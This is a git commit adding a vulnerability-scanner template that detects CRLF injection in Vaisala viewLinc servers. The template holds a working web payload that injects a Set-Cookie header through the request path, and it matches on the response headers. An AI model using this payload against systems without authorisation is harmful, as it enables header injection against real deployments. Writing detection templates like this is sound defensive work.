Merge pull request #1089 from geeknik/patch-47

Create viewlinc-crlf-injection.yaml
2021-03-16 14:06:59 +05:30 · 2021-03-16 14:06:59 +05:30 · a1d79964b8
parent f099ed021f 3c8432686c
commit a1d79964b8
1 changed files with 29 additions and 0 deletions
--- a/vulnerabilities/other/viewlinc-crlf-injection.yaml
+++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml
@ -0,0 +1,29 @@
+id: viewlinc-crlf-injection
+
+info:
+  name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
+  author: geeknik
+  severity: low
+  reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
+  tags: crlf,viewlinc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - "Server: viewLinc/5.1.2.367"
+          - "Set-Cookie: crlfinjection=crlfinjection"
+        part: header
+        condition: and
+
+      - type: word
+        words:
+          - "Server: viewLinc/5.1.1.50"
+          - "Set-Cookie: crlfinjection=crlfinjection"
+        part: header
+        condition: and